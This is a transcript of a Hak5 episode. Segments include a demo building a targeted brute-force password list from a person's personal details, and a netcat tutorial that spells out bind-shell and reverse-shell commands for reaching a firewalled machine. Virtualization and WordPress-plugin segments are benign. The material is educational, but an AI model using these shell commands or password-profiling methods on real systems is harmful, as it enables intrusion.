Coming up on the show, virtualization continued. Pimp your WordPress blog with awesome free plugins, build a targeted dictionary for your brute force attacks, and mysteries of netcat revealed. All that and tons more on this episode of Hak5. This episode of Hak5 is brought to you by Squarespace, GoDaddy, Gamefly, and viewers like you. Hey guys, welcome to this episode of Hak5. I'm Shannon Morse.
I'm Darren Kitchen.
I'm Matt Lestock.
And this is your weekly dose of Technolist. Guys, what's going on this week?
Having lots of fun. I'm looking forward to tomorrow.
Me too. Air show, baby. Yes.
I love air shows.
Oh, me too.
Gonna bring my 70 to 300, my Sigma. Yeah. I just wish it was like f2.8. But it's gonna be a bright and sunny day, so whatever, you know?
So are you actually happy with the lens?
I am. I played around with it a lot more, and the conditions that I was first playing with it in, like inside of a circus and on a boat, weren't necessarily the most steady conditions.
No.
But the circus
And
was awesome.
this is going to be really sunny. I'll just crank up the shutter, see what happens. I mean, we'll see.
I really like cotton candy.
No.
Yeah.
I like peanuts.
I like Matt's password. You want to come up with it?
Yeah.
Sure.
You guys want to play with the common user password profiler? Take a look at this. I'm playing Back and Backtrack 4, and
Back and Backtrack.
yeah, Back and Backtrack, baby. And there's this really cool new utility over at Remote Exploit, and it's the I'm just going to call it CUPY because it's a Python program, and it's called CUPP for Common User Password Profiler. So I mean that's like /CUPY, like what your sister drinks out of. Okay,
Yeah.
so. If you go ahead and run that, you get this cute little ASCII animation here of a cow, I believe, and we're going to run this in interactive mode.
Dog.
What this is this helps you generate passwords for a brute force attack. So if I was trying to log into Matt's machine, I may have a huge dictionary file with like all the stuff, and it may even have those cool like leet options where it'll do like replacing numbers for letters and stuff like that. But that's not really specifically targeted towards Matt. It doesn't know his personality, so this helps you generate a password dictionary list that would be geared towards you. And I can even couple it with a dictionary list that I already have created. So we're going to go through
Let's
here.
see how well this bad boy works.
All right, so we're going to call it Matt. And let's see, surname is Lestock. And his nickname is Chew. And his birthday is, let's see, 21, 11, 1982, right?
Yeah.
Okay, and his wife's name, we're going to just say Shannon.
She's that
Snubs. Wife's
Isn't no one
birthday,
married?
well, that would be
It's true.
18,
This is my husband.
11, 1985.
you picking random numbers?
Child's name, we're going to go ahead and say Paul. Nickname, what's Paul's nickname? Does he have one?
Camera guy.
Camera guy.
Camera guy.
The in love with
And,
anime girls.
I don't even know. Paul, what's your birthday, dude?
10/11/84.
11/10/1984.
Awesome.
Paul's a young
Pet's name, Kirby. All right. Company name, Hak5. Do you want to add some special stuff? Yes. We're going to do radio.
God, this is some bullshit. Sorry. Language.
The Browns. Yeah, because he likes that baseball or the football team.
Football. Yeah, that's
Feel
right.
free to email Darren that he should follow
And-
up on sports and actually learn what sport.
Whatever.
Who are the baseball people that we were watching shooting hoops
Yeah.
earlier today?
All right. And then finally,
Cleveland somethings.
the
Cleveland
Smurfs.
All of you
Blues.
can go F yourselves.
And we'll add the
Pistons.
Smurfs.
Just kidding.
Special characters.
Thousand motherfuckers?
Nah, we're not going to do special characters. And let's do random numbers at the end.
Okay.
And let's do leap mode. And then check this out. So it
Yeah,
creates
why
this
not?
dictionary file here, and I'm going to go ahead and just open it up in Nano. Matt. Did it create it or not? Yeah, Matt.t. Oh, capital M. And there we go. Is your password Camera Guy Lestock 923?
No.
Is it Smurfs 1985?
This is the dumbest
1985?
thing ever. No, seriously. Okay, because if you know all of this, you've probably tried every single one of those already.
No, now I have 92,000 of these to try, and I can just automate that.
If you're dumb enough, if the user that you're trying to break into is dumb enough, they're not going to have 92,000 variations in their brain.
I'm going to tell you a quick story. I'm a systems administrator, like you know the deal, right? You go to help the person on their computer, and you're like, oh, I just need you to log in, right? And I even say, I don't want your password, just go ahead and log in. I even look away, because I don't want to see them type it, because I'll remember that crap, right?
And they still say it out loud.
And she's like, oh, it's Jordan 1993. Why was it Jordan 1993? That was her son's name and the year he was born.
Right, okay. But you are the one entering this. So you already know it.
Well, no, I already know. I know about
No. You're an attacker.
Yeah.
Okay, and you already know. You already know all
you.
that stuff about me.
Yeah, I pulled it off MySpace.
Isn't Jordan
Facebook,
1993 the first thing you're going to try?
Yes. But it could be 1993 Jordan.
Dumb users aren't that smart.
It could be 1993 Jordan.
No.
This takes the work out of it. I'm just saying. You know, just peruse the MySpace, get the infos, throw it in there, put your bot at it, have a good time.
Touche.
Yeah. But don't do anything illegal.
Yeah.
Yeah. What else do we have going on?
I want to let you guys know that we are on a plethora of different, there's the crazy amount of ways to get us.
Yes, we are on revision3.com and hak5.org.
Oh, no, there's other places I've heard.
Yeah.
Somebody asked me if we were on iTunes. And yeah.
I think we are.
We've been on iTunes since before the iPod had video.
If you have not realized and you're not watching this in HD and have the capability of downloading HD, we are in HD. So you might want to go ahead and subscribe to the HD RSS feed or the HD iTunes feed.
Yeah, and you can also find us on YouTube and TiVo and Miro, and all of those are at the top of hak5.org. So find all your links there. But we just want you to get us weekly.
As far as TiVo, you have to have a TiVo connected box, but I'm sure you guys already knew that. So
tell your friends.
Yeah.
Spread the technolust.
Yep. Ooh, we're gonna have a contest.
Yeah?
Yeah.
Does it involve technolust?
Yes.
Would it cause a rash?
No.
Good.
Oh, that's good.
I have to think about the contest.
All right, well, you do that because we're doing an Easter egg hunt. We'll do it later. We'll talk about that later. Anyway, so coming up later in the show, Matt's following up with virtualization. I know you're talking about WordPress stuff. I'm going to take you guys into the kitchen, and we're going to go find out a little bit about kitties and the internet. Actually, about netcat. It's about hacking. Anyway, let's come on over here. So today I want to talk about netcat, which is kind of like a TCP/IP, UDP, read-write tool. It's an open source tool, it's cross-platform, and this is one of these things where I just want to get through this stuff because it's a real fundamental thing that we're going to be expanding on a little bit later when we start doing exploits and stuff like that. It's what could be considered the Swiss Army knife of TCP/IP, or at least that's what the developers kind of call it. And we are going to just learn by example here. I want to show you some of the nifty things that you can do when you're sending TCP or UDP or listening to TCP or UDP and just reading and writing those packets over the wire, having fun with it. So let's take a look at these quick examples, and I think you're really going to grok how powerful this tool is. So first of all, if we can go ahead and read and write TCP, let's go ahead and connect to an HTTP server, just like we would with like Telnet or a web browser, something like that. I'm going to fire up netcat here. I'm in backtrack 4. Grab that at remote exploit, awesome stuff. And it's just NC is the command, V for verbose, and I'm going to go to 10.10.0.31, which is my web server up there on port 80. And you'll see that I have indeed connected, and it knows it's a web server, www. And I'm going to write in here head/http/1.1, right? And when I do that, I get a bad request. But what's important here is that I actually get the header from the banner of this HTTP server, and I can tell that it's an Apache 2.2.11 server. That's what's known as like banner grabbing. So you can use this tool to say like you're using Nmap or something, and you found a something interesting. You could go and use this to kind of query that service, whether it's like an HTTP server, an FTP server, SSH, whatever, right? And in many cases, you can get version numbers, which are important for when you want to maybe look up if there's an exploit for that or something. We can also use this as a rudimentary chat. So what I'm going to do here, since it's a read and write tool, kind of envision as a client and server tool, I'm going to be showing you a couple of examples here with my machine in backtrack 4, and also my Vista machine upstairs. So like I said, netcat is cross-platform, so I have it here in Windows, and what we're going to do is demonstrate how we can use it to do a rudimentary chat. So I'm going to issue netcat hak5 for verbose and hak for listen on port, and we're going to use 1, 2, 3, 4. So now the Windows machine is just listening on TCP port 1, 2, 3, 4 for whatever, right? It's real raw TCP. It's beautiful. So we're going to come over back to the Linux side, and I'm going to issue netcat hak5, and I'm going to give the IP 10.10.0.31 and port 1, 2, 3, 4. And we've connected. But there's nothing really going on. We come back here and look at if I just scroll this over, take a look at our Windows side, and we don't really have anything interesting until I type hello. There we go, right? So, we can have a very rudimentary chat. If you've ever used something like TTY on Unix, it might be a little reminiscent. But there's a basic idea of how this is working. We're just sending, it's like a raw serial connection, but it's over TCP or UDP. So let me close that and give you an idea of, all right, so we can send data. Well, with some interesting pipes, we can actually send some files. So let's go ahead and create a file here and send it to our friend, the Windows machine. And this is something that you could use if you wanted to, for instance, send some log files over. It's just a real quick, easy way if you didn't have SSH set up to like SCP file over, or FTP or TFTP or email or whatever. You could just get a file across the network real simple like this. So for that, what we're going to go ahead and do is listen on what we'll consider our server side. So on the Windows side, I'm going to do netcat hak5 and listen on port 1, 2, 3, 4 again. And this time, you can see I am going to give it a little waka there. And we'll come back to that in a moment. Now, we're going to need a file to send it. So I'm going to go ahead and touch Tina Fey here. And I'm going to echo is smoking to Tina Fey. All right. And now we have a file. Let me just cat that, make sure it's there. Great, it's there. So I'm going to send that file over to the Windows machine using netcat now. I just netcat hak vn. And I'm going to give it the port, vn, and then the port, which is 10.10.0.31 on port 1, 2, 3, 4. And now I'm going to give it the walk in the other direction. I'm saying send this file into, and that file, of course, is Tina Fey. Press enter, connection refused. Beautiful, because we are not listening. OK, so let's come back over here and say Tina Fey. Enter. OK, now we're listening, and we're expecting whatever data that we get through there to be pumped to the file Tina Fey on the Windows side. We run this again on the Linux side. There we are. The only problem here is we don't get not like how wget has a beautiful little status indicator when your file is transferred. We get no information like that. Since it's small, I know it's done. I'm just going to break out of it and make sure it's there. So I'm going to dir Tina. There it is, and I'm going to type Tina Fey and is smoking. There we go. So I mean, it's easy as that. Now there are two other interesting examples that I want to show you, kind of how powerful netcat can really get, and then later on we'll talk about some other amazing stuff that you can do. The first thing I want to do is show you guys how you can set up what's called a command redirection. We're going to bind a shell or a program or anything like that to netcat, just as we did with this file. So in this instance, what I'm going to do on the Windows side is I'm going to set up netcat to listen, but we're also going to have it bind to cmd.exe, or the command prompt. So on the Windows side here, it's nc tac lvp for listen verbose on port 1, 2, 3, 4, and tac e cmd.exe. Okay? So that's listening for a connection to port 1, 2, 3, 4, and when it does, it's going to bind that to the command prompt. So back over here in Linux, nc for netcat hak5, I'm going to say 10.10.0.31, and again 1, 2, 3, 4. It's open, and just a moment here. There we go. You can see I have the : /tools. I can say, type tnfa, and there we go. So this is a great way to quickly set up a shell if you don't have SSH or some other nefarious fun stuff that we're going to be getting into later. Now, the thing about this is say like one of these machines was like behind a firewall or something like that. Maybe it was a machine on the inside of a corporate network, right? And we can't just port forward nilly-willy. We're not public facing, and we would like to get back to that machine later from the convenience of the hack house, for instance. Well, we can't easily just listen on any port, but what we can do is do the reverse of that. We can send the shell to a listener. So in that instance, what we're going to do is set up the Windows server here to be the listener. And for that, nc-lvp1234. So we're listening verbose on port 1234. And let's pretend, let's go back over to the Linux side here, and let's pretend that this machine is the machine that's behind the firewall, and we want to send it our shell. So in that instance, just like we were doing before with the tac-e of cmd, we're going to send it bin bash. So that'll be nc tac-vn, and then 10.10.0.31, because that is public facing, or in this instance, in this example, and then tac-e/bin/bash, which is the equivalent for cmd and Linux. And there we go. We come over here, and you don't really see a whole lot. It just lets us know that we're connected. But if we issue ls here, there we go. We actually have a directory listing, and we can run top, we can run whatever, and we are on that machine. Now, there's a lot of other interesting things that you can do with netcat, and I'm interested in what kind of crazy stuff you do with it. So definitely hit me up, feedback@hak5.org for that. And I actually have a couple of user-submitted ones here, some crazy ideas that you guys do. Kevin Sean writes to tell me that he actually uses this to tail log files. Makes a lot of sense. You're running a process on one server. You need to go to another computer so you monitor it without having to do like a VNC session. Precious Roy mentions that you can actually use this to DD, or to do a disk image of a hard drive from one computer to another computer over the internet, and I'll have links to an article on how to do that in the show notes. Joey Adams says that this is a great way to do port redirection, which we're going to be talking about next week. And then Twitchtastic, or his email actually came from Domain Administrator, so I wonder what he does for a living. Anyway, he mentions that you can use this the same like we showed you with port 80 connecting to a web server. Well, he likes to send user agent Internet Explorer 22 just to really screw with people that check their server logs, and then send the refer from like Lemon Party or something like that, which is quite mean. Anyway, netcat, awesome tool, open source, highly recommend you check it out, Windows, Mac, Linux, whatever. I have links in the show notes, fun ways to do this, and I want to let you know that we are going to be doing some stuff that involves this later on, but right now I'm going to go ahead and let you know that we have virtualization coming up with Matt, and before then, let's find out what's going on with this week's LAN party.
All right, guys, get ready. I know you've been waiting for it. This month, we are playing GoldenEye Source. Yeah, that's right. Finally! We're going to be playing over at ges.hak5.org on Saturday, May 30th, so the end of this month. Get prepared. And if you want to check out any cool games, any cool LAN parties that you're excited about, you can go over to hak5lan.squarespace.com and sign up and vote for your favorite game. I think Darren has a little bit of information for us about Squarespace.
That's right. We want to thank Squarespace for sponsoring the LAN party, and I'm here on our LAN party page, and I want to show you a nifty feature. It looks like I'm just on the page, but I get this extra button here to post a new entry, and I can do just that. Fill in my details here. And what's nice is I get a rich text editor, and it's kind of like a WYSIWYG. I can click these easy buttons here to add rich media, like I'm going to add an image here from a direct URL. And what's nice is right there within my copy, I can go ahead and grab these little selection boxes and resize my image right from within my document, realign it, and if I want to, I can get nitty-gritty and take a look at the code. Squarespace is just that powerful. You can get your Squarespace plan Over at squarespace.com, use coupon code hak5 and get 10% off the life of your service.
Thank you, Darren. And up next, we have some awesome information from Matt about virtualization over at his office. Let's go join him.
All right, guys, so we are here back in my lovely office in Williamsburg, Virginia for part 2 of our virtualization segment, or intro, or series if you want to call it. Got a lot of good feedback about the first episode that we did, which was basically just an intro into the cost savings associated with virtualization. Today what we're going to do is we're going to take that one more step further, and instead of going into the cost benefits, we're going into the disaster recovery or high availability. What I'm going to do is I'm going to show you some best practices for implementing a multi-host with SAN connected storage for like a cluster or so on and so forth. So let's go ahead and take a look at the whiteboard here. What we're going to do is we're going to draw out the best practices for networking and storage. So let's start with our 2 hosts. We've got a 2-host virtual machine like the R900 that I mentioned yesterday. I know I only said that I have 1, but we don't have the money for a second one. So we'll go ahead and start with host number 1 and host number 2. Okay, these are both running VMware ESX 3.5. So by themselves, they would be, great standalone virtual machine hosts. However, what we want to do is we want to actually utilize a third box. This is going to be our master controller or virtual center server. Virtual center is going to connect to these 2 boxes, and it's going to say, hey, I now see 2 hosts in this landscape, if you will. And from there, we can actually manage all of the virtual machines from Virtual Center Server instead of logging into box 1 to manage a certain set of virtual machines or box 2 to manage another set of virtual machines. So we've got Virtual Center all hooked up. Now we need to hook up networking. So how do we do that? Well, best practices state that you should have fully redundant paths to each of your hosts. So now we've got 2 network switches. Okay? What we do is you've got your interconnectivity coming through. So 1 to here, 1 to there, 1 to here, 1 to there. So now if one of these switches goes down, switch 2 kicks back in and does its thing. Now, networking is a lot easier in the new version of VMware infrastructure, which is now called vSphere. Horrible name, great product, which makes setting up a data center network a lot easier. I don't have access to the beta, but rest assured, as soon as we do get access to it, I'll go ahead and let you guys know how to exactly set up networking. The other thing that you want to do is you want to have another set of switches. And these will be your iSCSI switches. Oh, I just broke that. Don't think we're using blue anymore. So let's use black. So now we've got 2 more switches here. Okay, and we've got our SAN here. Now obviously replicating SAN is a little costly, and you need to get into the EMC, high-end EqualLogics to actually replicate SAN storage. So what we're going to do is we're actually going to go ahead and do just like we did with, yes. So this comes down here, and then this one comes down here, and this one goes here, and this one goes here. So you see where trying to implement, this gets a little crazy. However, when you think about it in terms of, okay, I have 1 point of failure, now I've got another point of failure. I've got 1 point of failure, another point of failure, 1 point. So this really becomes then your single point of failure for, hardware-wise. Now, we can try and, alleviate that by going to, say, A properly architected RAID 50, which is basically spindle 1, is a group of, we'll say 3 in my case, 3 drives in one spindle, 3 drives in another spindle. Okay, so these would each be RAID 5s. Okay, and then once we have all these RAID 5s created, we go ahead. Actually, that's wrong. We actually connect these up to a RAID 0. Okay, so each one of these is a RAID 5 array, which makes rebuilding, should one of these drives fail, quicker because you don't have to rebuild, say, a 12 terabyte array. And also you get the speed of striping across RAID 5 arrays. So you've kind of mitigated the problem of having a centralized storage solution. Okay. Now, the nice thing about VMware ESX, or actually I should say Virtual Center, is the bolt-on applications that they have. You can have DRS, which is, I believe, dynamic resource sharing, where it'll monitor if box 1 is at 80% and box 2 is at 20%. You could set a threshold of, I only want these boxes to be, peak utilization at 60%. So what VMware Virtual Center will do is it will live migrate using storage, what they call vMotion, and all these products have been renamed, so bear with me. It'll migrate a certain number of VMs over to here to balance out to your specifications. Now the other nice thing is, like I said, with you've got vMotion, and you can go ahead and live migrate with no downtime from this box. Say you have a hardware failure, one of your RAM sticks is dead, or you've got upgrades that you need to do to the BIOS to resolve some funky thing. You can actually push everything over with like minimal interruption in service. We're talking less than 5 seconds, where you could push all the virtual machines, and then you could safely, bring this machine down or upgrade it, and then from here push everything over, do the same to this one. So here is the ideal setup for your VMware implementation. SAN, redundant switches for your network, redundant controllers, and if you wanted to, you can even have multiple Virtual Center controllers. Now, like I said, I got a lot of good comments about my setup. My setup is, like I told you in the beginning of last week, not ideal. Single point of failure on the server, SAN space is an issue. We've only got one network. This is a very costly setup, not only due to licensing fees, but actually all the hardware that you're going to need to purchase. However, this is probably the easiest way to do high availability, which is exactly what we've got set up here, dynamic resource sharing, vMotion capabilities with minimal downtimes in service, so on and so forth. Think about that when you're implementing a solution for a piece of software which is millions of dollars, in which my company's case is SAP. So for however much it is, $125,000, $150,000 in an implementation like this, you could actually get away with. I know your CapEx budgets are tight, but I really think if you haven't already, go ahead, shoot me an email with your questions, matt@hak5.org, post them on the forums. But if you have any questions about how to architect virtualization, I'm sure I'm probably missing something here, but go ahead, email me. I'll be sure to answer it on an upcoming episode when we actually show you how to set these things up. So for more on this, head on over to mattlesnock.com or hak5.org.
All right, guys, once again, it's time to tell you guys about trivia, or so the block is called. Now, first of all, we have to talk about the monkey contest. The winner is announced right now, and it is Spike CB. Listen, we went through a lot of these awesome submissions. Everybody did a great job. If I could give you a Little League trophy, all of you, I would. but we are actually giving Spike CB an epic sock monkey kit of his own so he can make his very own crazy sock monkey and hopefully send us pictures from hak5.sockmonkey.net. Thank you, Tamara, for all of that. And I still want to let you know that there is our coding challenge going on. You can get all the details at hak5.org/code challenge. We're doing a little PHP, doing a Gmail badge, and having a lot of fun with it. So already seeing some great submissions. There's still a couple days to get in on it, so make sure you check that out. The winner of such contests will be announced next week on episode 512. Will win the awesome PHP reference book by Mario Lurig, and I think you guys might really enjoy that. And before we get to what this week's thing is, let's kick it over to Shannon. Thank one of our awesome sponsors, GoDaddy.
GoDaddy, thank you so much for sponsoring this episode of Hak5. If you want to make an impact online, GoDaddy.com has what you need. .com names as low as $1.99 plus world-class hosting, fast and easy website builders, and much more. And if you use code HAK1, that's HAK1, you can get 10% off your order. Some restrictions apply. See the website for details and get your piece of the internet at GoDaddy.com. Darren, take it away.
All right, so here it is. This week's contest thingy is actually an Easter egg hunt. So I think you guys are really going to enjoy this. Take some of what you've already learned in this episode and apply it to rtt.hak5.org. That's your only clue, all right? And next week we'll talk about it and do some stuff, and basically you get in on this Easter egg hunt here and find the answer, and you'll find how to submit it when you find the answer. You will be eligible to win not only a lock of Matt's hair, but a deluxe hak5 hack pack signed by all of us. So anyway, hope you guys get in on that, and right now I'm going to kick it back over to Shannon to find out about WordPress plugins to pimp your blog.
So this past week, I have been traveling all over the WordPress site looking for my favorite plugins. So I went through hundreds of them, and I found, I guess what you would call them, my top 10. The first one I want to talk about is TwitMe. It basically takes your blog post and transfers it straight over to Twitter. And I have up a example right here. I just called it "This is a test." It automatically types in whatever you want it to, and it gives a link over to your blog. The second one I want to talk about is called Socialite. That one does pretty much the exact same thing, except it works for Facebook, MySpace, and Twitter. I personally like TwitMe more for Twitter, so I just use Socialite for Facebook and MySpace. So I can get all of my blog posts transferred over to all sorts of different social networks at the same exact time. Sociable is pretty cool. This one actually gives you a whole bunch of share this icons. And you have 99 different ones to choose from. You can choose your favorite ones to link to. And there you go. That's all you need to know. The next one I found out about was called Mobile Press. This one I can actually show you on my phone. It actually made my blog into a mobile blog. So it shows up perfectly clean and clear for anybody who wants to go to my blog on their cell phones. Except for some reason it doesn't work on BlackBerry. It just works on iPhones and Palms, from what I know. My fifth favorite one is called Resize at Upload Plus. This one basically takes your images that you upload to your blog, to any of your new entries, and automatically turns them into your defined width and height, and nothing over the maximum that you choose. So on my site, I made all of mine turn out to be less than 500. No more than 500, or else it'll cut off everything on the side. So right here you can see this picture actually is about, I don't know, 1024 by 768 or something, and I made it a whole 500 pixels wide. The next plugin that I found is called WP Security Scan. It scans your WordPress installation for security vulnerabilities, and it suggests corrective actions. So on mine you can see I have a certain version, I have the latest stable version, I have a table prefix that is not WP, and at the bottom it says that I have an admin user that still exists. I should probably fix that, and it gives me some ideas on how to fix it if I click the button. It says how to change WordPress admin username, so it gives me ideas on how to fix that. Okay, WordPress backup. That's a really good tool for pretty much everybody to have. It backs up pretty much your entire database of your blog and automatically emails it to whatever email address that you want it to. I decided to make mine email me once a week with all of my database files in one zip file. It's a great program for anybody who's worried about losing their information on their website. WP Ban is one of my favorites. I've used it since I first started off with my blog, and it's very, very helpful if you have anybody go into your site that spams a lot or says anything mean to you, whatever. It bans IPs, it bans IP ranges, host names, and refer URLs that try to visit your blog. You can even redirect it to go to other websites. So I have one of mine going to, I think it's this I own you image. It works really well, so I definitely want you guys to give it a try. The very last one that I want to tell you about is called Pixel Stats. Pixel Stats is basically a very minimal Google Analytics for your website. If you're not really into the whole thing and you're interested on how many views you have, you're interested in a couple of those things, but you don't really care about all the analytics and keywords that people actually type in to go to your blog, you can try this. Pixel Stats just gives you total views, unique visitors, just a couple of things if you're a little interested, but not that much. If you guys have any interesting plugins or even widgets for your blogs that you want me to check out, definitely hit me up at feedback@hak5.org and tell me what you think. I think we're going to end this show now, so I'm going to go grab the guys.
Here we go, here we go, here we go, here we go, here we go.
Alright guys, that about wraps up this episode of Hak5. I think you have a little bit of Ubuntu remixing up on it?
Dude, I'm rocking the new Ubuntu 9.04. Matt's a huge fan of it, as he is most Nix distros and BSD.
Keep it on the DL. We got a little bit of information for these people before we talk about that.
All right, tease it, throw it up good, all that stuff.
What's up, Matt?
I want to let everybody know that Gamefly is an amazing service. They are the largest online video game rental service and offer a choice of over 6,000 new and classic titles across all consoles and handhelds. With plans starting at $15.95 a month, Gamefly members can rent 1 to 4 games at a time and keep them for as long as they like. You can also purchase a game if you fall in love with it. They'll send you the box and the manual for a nominal fee. Head on over to gamefly.com/hak5 to get 2-week free trial membership. Gamefly.com/hak5.
And I have to say, it's totally worth it.
Yeah, we were just finishing Hawks, and that was great because that was a rent. I know that they got downloadable content for the Hawks, but
it's a short game, but it was
pick it up,
amazing.
beat it, send it back in the
It wasn't
mail.
short. You were playing that for days and hours.
But
We
it
only
felt
played 3
short.
missions
it
a
felt
night
short 'cause
for
it was so
a week.
amazing.
So
I love that game.
it's not like Half-Life,
Video games.
One.
So
Yeah.
amazing.
For a second,
Oh, yeah.
lickety-split.
I have to tell you guys about Dig Reel. We just watched the newest episode of Dig Reel. Last week it was episode number 67. Andrew talked to Mythbusters. Yeah, that's right, Mythbusters.
Hey, didn't they have that video from the one with the rocket that
Yes.
smashed into the car?
650 miles an hour.
Dude, amazing.
pretty badass.
It flattened the car. It was so cool. Anyway, you guys got to check it out. revision3.com/digreel. It's on new episodes on Mondays.
Oh, yeah, and Andrew got zapped twice, one in each
Awesome.
nipple.
Wait, let's not tell them about the episode. They have to go watch it.
Sorry.
What's up
All
with
right.
you?
Yes, Mr. Ubuntu.
You want to check this out?
Not really.
Yeah, so I'm checking out Ubuntu 9.04. Just came out, and this is actually the netbook remix. It's actually made specifically for these Tonka toys that you oh so love, Matt. And it's Linux, so it's both of your things you love in one.
It's amazing.
The interface is kind of interesting here. We can just like drill down here, and it's like all of these little menus. And what's kind of funky about it is when you open these programs, you just kind of chill up here in the top left, and everything's like pretty much full screen. So makes it for doing one thing at a time. But you don't have a lot of resolution on these little tiny bastards, so
It looks very user-friendly.
it's kind of newbie
Not so
friendly.
much for somebody who runs a ton of different programs all at the same time like we do on our dual monitors, but
Yeah, I'm sticking to, well, I mean, for your netbook, though, that's what it's for. Although,
Yeah.
seriously, on my Acer Aspire 1, which I just bricked, thanks, Acer, for that awesome firmware in your BIOS or whatever. I'm just sticking to Backtrack 4,
Nice hat.
because it's KD, or it's Debian, whatever, one of those.
Debian.
Yeah, Debian's good stuff. Oh, and
What's
somebody
going
asked.
on with Movix over here?
Yeah, somebody asked about if we could talk about getting a career in IT, because everybody, do you get that question, Matt? Like, how'd you get your job in, as a CTO?
I'll
or
work
assistant?
your fucking ass off.
Yeah,
It's that simple.
No, actually,
Yeah.
I'll give you the list of certifications and the degrees you need, because it's really about the letters after your name.
No, it's not.
Okay, actually head over on to Room 362 because Movix has an awesome blog post. There's actually a video going along with this. It flash worked in
Kind of
Netbook
different
Remix.
because he was already in the industry.
Well, no, okay, you're right. He was in the
It's
you're right.
completely different.
It is. But if you're already and you're looking to move or something, he actually gave a presentation at
Yeah,
Dojo
I saw
Sec.
it.
Yeah, you saw the video. It's about how to go from couch to career in 80 hours or less. So, for those that have been interested in that kind of stuff, I'm
Sounds
going to
cool.
defer you to the expert Movix.
Just remember, guys, we've got the new Hak5 website launching in the next week.
Episode, yeah, next week.
Next week, along with the new store that Darren has promised to populate with all kind of brand new goodies. I know Paul and Darren are working on a promotional
it.
video for you guys so that you can be really excited about some of the things that we've got coming out. I know Darren wore the one shirt, but we've got some other stuff for you. So
You
I
can
don't
see
know.
a sneak peek if you know where to look.
Shh.
That's true.
So head on over
Bunnies.
to hak5.org/stickers to support the show. And remember, iTunes, TiVo, Miro, YouTube.
Get your Techno Lust
RSS weekly. And
We like it when you get it within the first 4 weeks of it coming out.
Yes.
There's a reason for that. Just within the first 4 weeks would be best.
And also remember, share your techno lust.
All right, guys. We will see you next week. So in the meantime, have fun, stay safe, trust your Techno Lust. Oh, I know. We'll have an Elite Pearl contest, and we'll give them a Visual Basic book.
Big, juicy ones.
Wait.
Moving on.